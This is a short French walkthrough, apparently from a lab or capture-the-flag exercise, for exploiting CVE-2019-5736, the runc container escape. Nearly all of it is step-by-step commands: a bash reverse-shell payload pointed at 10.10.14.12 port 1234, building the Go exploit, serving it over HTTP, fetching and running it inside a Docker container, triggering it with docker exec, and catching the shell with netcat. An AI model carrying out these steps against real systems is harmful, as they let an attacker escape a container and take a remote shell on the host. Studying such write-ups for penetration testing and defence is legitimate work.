
Outil d'exploitation basé sur Go pour CVE-2019-5736 (évasion de conteneur Runc) avec une charge utile de shell inversé personnalisable, conçu pour les tests d'intrusion et les opérations d'équipe rouge contre des conteneurs Docker vulnérables.
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736
La machine est vulnérable à la CVE-2019-5736, suivez les étapes de l'exploit Runc (CVE-2019-5736). Téléchargez le fichier main.go, modifiez le payload dans le fichier en :
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
Ensuite, exécutez :
go build main.go
Hébergez un serveur HTTP :
python3 -m http.server

Ouvrez ensuite 3 terminaux comme ci-dessous :

Terminal 1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
Terminal 2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
Terminal 3
nc -nlvp 1234
Une fois que vous exécutez ./main dans le premier terminal SSH, exécutez immédiatement la deuxième commande dans le second terminal SSH, puis vous obtiendrez le reverse shell netcat dans le terminal 3

